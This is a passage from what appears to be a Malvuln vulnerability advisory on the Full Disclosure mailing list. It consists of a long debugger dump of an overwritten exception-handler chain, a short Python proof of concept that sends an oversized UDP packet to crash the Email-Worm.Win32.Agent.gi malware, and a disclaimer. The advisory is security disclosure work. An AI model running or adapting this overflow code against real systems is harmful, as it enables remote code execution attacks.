03334144: ntdll!ExecuteHandler2+44 (773e9d70)
033346f4: ntdll!ExecuteHandler2+44 (773e9d70)
03334ca4: ntdll!ExecuteHandler2+44 (773e9d70)
03335254: ntdll!ExecuteHandler2+44 (773e9d70)
03335804: ntdll!ExecuteHandler2+44 (773e9d70)
03335db4: ntdll!ExecuteHandler2+44 (773e9d70)
03336364: ntdll!ExecuteHandler2+44 (773e9d70)
03336914: ntdll!ExecuteHandler2+44 (773e9d70)
03336ec4: ntdll!ExecuteHandler2+44 (773e9d70)
03337474: ntdll!ExecuteHandler2+44 (773e9d70)
03337a24: ntdll!ExecuteHandler2+44 (773e9d70)
03337fd4: ntdll!ExecuteHandler2+44 (773e9d70)
03338584: ntdll!ExecuteHandler2+44 (773e9d70)
03338b34: ntdll!ExecuteHandler2+44 (773e9d70)
033390e4: ntdll!ExecuteHandler2+44 (773e9d70)
03339694: ntdll!ExecuteHandler2+44 (773e9d70)
03339c44: ntdll!ExecuteHandler2+44 (773e9d70)
0333a1f4: ntdll!ExecuteHandler2+44 (773e9d70)
0333a7a4: ntdll!ExecuteHandler2+44 (773e9d70)
0333ad54: ntdll!ExecuteHandler2+44 (773e9d70)
0333b304: ntdll!ExecuteHandler2+44 (773e9d70)
0333b8b4: ntdll!ExecuteHandler2+44 (773e9d70)
0333be64: ntdll!ExecuteHandler2+44 (773e9d70)
0333c414: ntdll!ExecuteHandler2+44 (773e9d70)
0333c9c4: ntdll!ExecuteHandler2+44 (773e9d70)
0333cf74: ntdll!ExecuteHandler2+44 (773e9d70)
0333d524: ntdll!ExecuteHandler2+44 (773e9d70)
0333dad4: ntdll!ExecuteHandler2+44 (773e9d70)
0333e084: ntdll!ExecuteHandler2+44 (773e9d70)
0333e634: ntdll!ExecuteHandler2+44 (773e9d70)
0333ebe4: ntdll!ExecuteHandler2+44 (773e9d70)
0333f194: ntdll!ExecuteHandler2+44 (773e9d70)
0333f744: ntdll!ExecuteHandler2+44 (773e9d70)
0333fcf4: ntdll!ExecuteHandler2+44 (773e9d70)
033402a4: ntdll!ExecuteHandler2+44 (773e9d70)
03340854: ntdll!ExecuteHandler2+44 (773e9d70)
03340e04: ntdll!ExecuteHandler2+44 (773e9d70)
033413b4: ntdll!ExecuteHandler2+44 (773e9d70)
03341964: ntdll!ExecuteHandler2+44 (773e9d70)
03341f14: ntdll!ExecuteHandler2+44 (773e9d70)
033424c4: ntdll!ExecuteHandler2+44 (773e9d70)
03342a74: ntdll!ExecuteHandler2+44 (773e9d70)
03343024: ntdll!ExecuteHandler2+44 (773e9d70)
033435d4: ntdll!ExecuteHandler2+44 (773e9d70)
03343b84: ntdll!ExecuteHandler2+44 (773e9d70)
03344134: ntdll!ExecuteHandler2+44 (773e9d70)
033446e4: ntdll!ExecuteHandler2+44 (773e9d70)
03344c94: ntdll!ExecuteHandler2+44 (773e9d70)
03345244: ntdll!ExecuteHandler2+44 (773e9d70)
033457f4: ntdll!ExecuteHandler2+44 (773e9d70)
03345da4: ntdll!ExecuteHandler2+44 (773e9d70)
03346354: ntdll!ExecuteHandler2+44 (773e9d70)
03346904: ntdll!ExecuteHandler2+44 (773e9d70)
03346eb4: ntdll!ExecuteHandler2+44 (773e9d70)
03347464: ntdll!ExecuteHandler2+44 (773e9d70)
03347a14: ntdll!ExecuteHandler2+44 (773e9d70)
03347fc4: ntdll!ExecuteHandler2+44 (773e9d70)
03348574: ntdll!ExecuteHandler2+44 (773e9d70)
03348b24: ntdll!ExecuteHandler2+44 (773e9d70)
033490d4: ntdll!ExecuteHandler2+44 (773e9d70)
03349684: ntdll!ExecuteHandler2+44 (773e9d70)
03349c34: ntdll!ExecuteHandler2+44 (773e9d70)
0334a1e4: ntdll!ExecuteHandler2+44 (773e9d70)
0334a794: ntdll!ExecuteHandler2+44 (773e9d70)
0334ad44: ntdll!ExecuteHandler2+44 (773e9d70)
0334b2f4: ntdll!ExecuteHandler2+44 (773e9d70)
0334b8a4: ntdll!ExecuteHandler2+44 (773e9d70)
0334be54: ntdll!ExecuteHandler2+44 (773e9d70)
0334c404: ntdll!ExecuteHandler2+44 (773e9d70)
0334c9b4: ntdll!ExecuteHandler2+44 (773e9d70)
0334cf64: ntdll!ExecuteHandler2+44 (773e9d70)
0334d514: ntdll!ExecuteHandler2+44 (773e9d70)
0334dac4: ntdll!ExecuteHandler2+44 (773e9d70)
0334e074: ntdll!ExecuteHandler2+44 (773e9d70)
0334e624: ntdll!ExecuteHandler2+44 (773e9d70)
0334ebd4: ntdll!ExecuteHandler2+44 (773e9d70)
0334f184: ntdll!ExecuteHandler2+44 (773e9d70)
0334f734: ntdll!ExecuteHandler2+44 (773e9d70)
0334fce4: ntdll!ExecuteHandler2+44 (773e9d70)
03350294: ntdll!ExecuteHandler2+44 (773e9d70)
03350844: ntdll!ExecuteHandler2+44 (773e9d70)
03350df4: ntdll!ExecuteHandler2+44 (773e9d70)
033513a4: ntdll!ExecuteHandler2+44 (773e9d70)
03351954: ntdll!ExecuteHandler2+44 (773e9d70)
03351f04: ntdll!ExecuteHandler2+44 (773e9d70)
033524b4: ntdll!ExecuteHandler2+44 (773e9d70)
03352a64: ntdll!ExecuteHandler2+44 (773e9d70)
03353014: ntdll!ExecuteHandler2+44 (773e9d70)
033535c4: ntdll!ExecuteHandler2+44 (773e9d70)
03353b74: ntdll!ExecuteHandler2+44 (773e9d70)
03354124: ntdll!ExecuteHandler2+44 (773e9d70)
033546d4: ntdll!ExecuteHandler2+44 (773e9d70)
03354c84: ntdll!ExecuteHandler2+44 (773e9d70)
03355234: ntdll!ExecuteHandler2+44 (773e9d70)
033557e4: ntdll!ExecuteHandler2+44 (773e9d70)
03355d94: ntdll!ExecuteHandler2+44 (773e9d70)
03356344: ntdll!ExecuteHandler2+44 (773e9d70)
033568f4: ntdll!ExecuteHandler2+44 (773e9d70)
03356ea4: ntdll!ExecuteHandler2+44 (773e9d70)
03357454: ntdll!ExecuteHandler2+44 (773e9d70)
03357a04: ntdll!ExecuteHandler2+44 (773e9d70)
03357fb4: ntdll!ExecuteHandler2+44 (773e9d70)
03358564: ntdll!ExecuteHandler2+44 (773e9d70)
03358b14: ntdll!ExecuteHandler2+44 (773e9d70)
033590c4: ntdll!ExecuteHandler2+44 (773e9d70)
03359674: ntdll!ExecuteHandler2+44 (773e9d70)
03359c24: ntdll!ExecuteHandler2+44 (773e9d70)
0335a1d4: ntdll!ExecuteHandler2+44 (773e9d70)
0335a784: ntdll!ExecuteHandler2+44 (773e9d70)
0335ad34: ntdll!ExecuteHandler2+44 (773e9d70)
0335b2e4: ntdll!ExecuteHandler2+44 (773e9d70)
0335b894: ntdll!ExecuteHandler2+44 (773e9d70)
0335be44: ntdll!ExecuteHandler2+44 (773e9d70)
0335c3f4: ntdll!ExecuteHandler2+44 (773e9d70)
0335c9a4: ntdll!ExecuteHandler2+44 (773e9d70)
0335cf54: ntdll!ExecuteHandler2+44 (773e9d70)
0335d504: ntdll!ExecuteHandler2+44 (773e9d70)
0335dab4: ntdll!ExecuteHandler2+44 (773e9d70)
0335e064: ntdll!ExecuteHandler2+44 (773e9d70)
0335e614: ntdll!ExecuteHandler2+44 (773e9d70)
0335ebc4: ntdll!ExecuteHandler2+44 (773e9d70)
0335f174: ntdll!ExecuteHandler2+44 (773e9d70)
0335f724: ntdll!ExecuteHandler2+44 (773e9d70)
0335fcd4: ntdll!ExecuteHandler2+44 (773e9d70)
03360284: ntdll!ExecuteHandler2+44 (773e9d70)
03360834: ntdll!ExecuteHandler2+44 (773e9d70)
03360de4: ntdll!ExecuteHandler2+44 (773e9d70)
03361394: ntdll!ExecuteHandler2+44 (773e9d70)
03361944: ntdll!ExecuteHandler2+44 (773e9d70)
03361ef4: ntdll!ExecuteHandler2+44 (773e9d70)
033624a4: ntdll!ExecuteHandler2+44 (773e9d70)
03362a54: ntdll!ExecuteHandler2+44 (773e9d70)
03363004: ntdll!ExecuteHandler2+44 (773e9d70)
033635b4: ntdll!ExecuteHandler2+44 (773e9d70)
03363b64: ntdll!ExecuteHandler2+44 (773e9d70)
03364114: ntdll!ExecuteHandler2+44 (773e9d70)
033646c4: ntdll!ExecuteHandler2+44 (773e9d70)
03364c74: ntdll!ExecuteHandler2+44 (773e9d70)
03365224: ntdll!ExecuteHandler2+44 (773e9d70)
033657d4: ntdll!ExecuteHandler2+44 (773e9d70)
03365d84: ntdll!ExecuteHandler2+44 (773e9d70)
03366334: ntdll!ExecuteHandler2+44 (773e9d70)
033668e4: ntdll!ExecuteHandler2+44 (773e9d70)
03366e94: ntdll!ExecuteHandler2+44 (773e9d70)
03367444: ntdll!ExecuteHandler2+44 (773e9d70)
033679f4: ntdll!ExecuteHandler2+44 (773e9d70)
03367fa4: ntdll!ExecuteHandler2+44 (773e9d70)
03368554: ntdll!ExecuteHandler2+44 (773e9d70)
03368b04: ntdll!ExecuteHandler2+44 (773e9d70)
033690b4: ntdll!ExecuteHandler2+44 (773e9d70)
03369664: ntdll!ExecuteHandler2+44 (773e9d70)
03369c14: ntdll!ExecuteHandler2+44 (773e9d70)
0336a1c4: ntdll!ExecuteHandler2+44 (773e9d70)
0336a774: ntdll!ExecuteHandler2+44 (773e9d70)
0336ad24: ntdll!ExecuteHandler2+44 (773e9d70)
0336b2d4: ntdll!ExecuteHandler2+44 (773e9d70)
0336b884: ntdll!ExecuteHandler2+44 (773e9d70)
0336be34: ntdll!ExecuteHandler2+44 (773e9d70)
0336c3e4: ntdll!ExecuteHandler2+44 (773e9d70)
0336c994: ntdll!ExecuteHandler2+44 (773e9d70)
0336cf44: ntdll!ExecuteHandler2+44 (773e9d70)
0336d4f4: ntdll!ExecuteHandler2+44 (773e9d70)
0336daa4: ntdll!ExecuteHandler2+44 (773e9d70)
0336e054: ntdll!ExecuteHandler2+44 (773e9d70)
0336e604: ntdll!ExecuteHandler2+44 (773e9d70)
0336ebb4: ntdll!ExecuteHandler2+44 (773e9d70)
0336f164: ntdll!ExecuteHandler2+44 (773e9d70)
0336f714: ntdll!ExecuteHandler2+44 (773e9d70)
0336fcc4: ntdll!ExecuteHandler2+44 (773e9d70)
03370274: ntdll!ExecuteHandler2+44 (773e9d70)
03370824: ntdll!ExecuteHandler2+44 (773e9d70)
03370dd4: ntdll!ExecuteHandler2+44 (773e9d70)
03371384: ntdll!ExecuteHandler2+44 (773e9d70)
03371934: ntdll!ExecuteHandler2+44 (773e9d70)
03371ee4: ntdll!ExecuteHandler2+44 (773e9d70)
03372494: ntdll!ExecuteHandler2+44 (773e9d70)
03372a44: ntdll!ExecuteHandler2+44 (773e9d70)
03372ff4: ntdll!ExecuteHandler2+44 (773e9d70)
033735a4: ntdll!ExecuteHandler2+44 (773e9d70)
03373b54: ntdll!ExecuteHandler2+44 (773e9d70)
03374104: ntdll!ExecuteHandler2+44 (773e9d70)
033746b4: ntdll!ExecuteHandler2+44 (773e9d70)
03374c64: ntdll!ExecuteHandler2+44 (773e9d70)
03375214: ntdll!ExecuteHandler2+44 (773e9d70)
033757c4: ntdll!ExecuteHandler2+44 (773e9d70)
03375d74: ntdll!ExecuteHandler2+44 (773e9d70)
03376324: ntdll!ExecuteHandler2+44 (773e9d70)
033768d4: ntdll!ExecuteHandler2+44 (773e9d70)
03376e84: ntdll!ExecuteHandler2+44 (773e9d70)
03377434: ntdll!ExecuteHandler2+44 (773e9d70)
033779e4: ntdll!ExecuteHandler2+44 (773e9d70)
03377f94: ntdll!ExecuteHandler2+44 (773e9d70)
03378544: ntdll!ExecuteHandler2+44 (773e9d70)
03378af4: ntdll!ExecuteHandler2+44 (773e9d70)
033790a4: ntdll!ExecuteHandler2+44 (773e9d70)
03379654: ntdll!ExecuteHandler2+44 (773e9d70)
03379c04: ntdll!ExecuteHandler2+44 (773e9d70)
0337a1b4: ntdll!ExecuteHandler2+44 (773e9d70)
0337a764: ntdll!ExecuteHandler2+44 (773e9d70)
0337ad14: ntdll!ExecuteHandler2+44 (773e9d70)
0337b2c4: ntdll!ExecuteHandler2+44 (773e9d70)
0337b874: ntdll!ExecuteHandler2+44 (773e9d70)
0337be24: ntdll!ExecuteHandler2+44 (773e9d70)
0337c3d4: ntdll!ExecuteHandler2+44 (773e9d70)
0337c984: ntdll!ExecuteHandler2+44 (773e9d70)
0337cf34: ntdll!ExecuteHandler2+44 (773e9d70)
0337d4e4: ntdll!ExecuteHandler2+44 (773e9d70)
0337da94: ntdll!ExecuteHandler2+44 (773e9d70)
0337e044: ntdll!ExecuteHandler2+44 (773e9d70)
0337e5f4: ntdll!ExecuteHandler2+44 (773e9d70)
0337eba4: ntdll!ExecuteHandler2+44 (773e9d70)
0337f154: ntdll!ExecuteHandler2+44 (773e9d70)
0337f704: ntdll!ExecuteHandler2+44 (773e9d70)
0337fcb4: ntdll!ExecuteHandler2+44 (773e9d70)
03380264: ntdll!ExecuteHandler2+44 (773e9d70)
03380814: ntdll!ExecuteHandler2+44 (773e9d70)
03380dc4: ntdll!ExecuteHandler2+44 (773e9d70)
03381374: ntdll!ExecuteHandler2+44 (773e9d70)
03381924: ntdll!ExecuteHandler2+44 (773e9d70)
03381ed4: ntdll!ExecuteHandler2+44 (773e9d70)
03382484: ntdll!ExecuteHandler2+44 (773e9d70)
03382a34: ntdll!ExecuteHandler2+44 (773e9d70)
03382fe4: ntdll!ExecuteHandler2+44 (773e9d70)
03383594: ntdll!ExecuteHandler2+44 (773e9d70)
03383b44: ntdll!ExecuteHandler2+44 (773e9d70)
033840f4: ntdll!ExecuteHandler2+44 (773e9d70)
033846a4: ntdll!ExecuteHandler2+44 (773e9d70)
03384c54: ntdll!ExecuteHandler2+44 (773e9d70)
03385204: ntdll!ExecuteHandler2+44 (773e9d70)
033857b4: ntdll!ExecuteHandler2+44 (773e9d70)
03385d64: ntdll!ExecuteHandler2+44 (773e9d70)
03386314: ntdll!ExecuteHandler2+44 (773e9d70)
033868c4: ntdll!ExecuteHandler2+44 (773e9d70)
03386e74: ntdll!ExecuteHandler2+44 (773e9d70)
03387424: ntdll!ExecuteHandler2+44 (773e9d70)
033879d4: ntdll!ExecuteHandler2+44 (773e9d70)
03387f84: ntdll!ExecuteHandler2+44 (773e9d70)
03388534: ntdll!ExecuteHandler2+44 (773e9d70)
03388ae4: ntdll!ExecuteHandler2+44 (773e9d70)
03389094: ntdll!ExecuteHandler2+44 (773e9d70)
03389644: ntdll!ExecuteHandler2+44 (773e9d70)
03389bf4: ntdll!ExecuteHandler2+44 (773e9d70)
0338a1a4: ntdll!ExecuteHandler2+44 (773e9d70)
0338a754: ntdll!ExecuteHandler2+44 (773e9d70)
0338ad04: ntdll!ExecuteHandler2+44 (773e9d70)
0338b2b4: ntdll!ExecuteHandler2+44 (773e9d70)
0338b864: ntdll!ExecuteHandler2+44 (773e9d70)
0338be14: ntdll!ExecuteHandler2+44 (773e9d70)
0338c3c4: ntdll!ExecuteHandler2+44 (773e9d70)
0338c974: ntdll!ExecuteHandler2+44 (773e9d70)
0338cf24: ntdll!ExecuteHandler2+44 (773e9d70)
0338d4d4: ntdll!ExecuteHandler2+44 (773e9d70)
0338da84: ntdll!ExecuteHandler2+44 (773e9d70)
0338e034: ntdll!ExecuteHandler2+44 (773e9d70)
0338ff68: 52525252
Invalid exception stack at 41414141


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=53

def doit():
    s=socket(AF_INET, SOCK_DGRAM)
    s.connect((MALWARE_HOST, PORT))

    #R for EIP
    PACKOLA="A"*324+"R"*8

    s.send(PACKOLA)
    s.close()

    print("Email-Worm.Win32.Agent.gi / Remote UDP Buffer Overflow (SYSTEM)")
    print("MD5: 74e65773735f977185f6a09f1472ea46");
    print("By Malvuln");

if __name__=="__main__":
    doit()



Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or
otherwise. Permission is hereby granted for the redistribution of this
advisory, provided that it is not altered except by reformatting it,
and that due credit is given. Permission is explicitly given for
insertion in vulnerability databases and similar, provided that due
credit is given to the author. The author is not responsible for any
misuse of the information contained herein and accepts no
responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security
related information or exploits by the author or elsewhere. Do not
attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper
Malware handling or the downloading of ANY Malware mentioned on this
website or elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ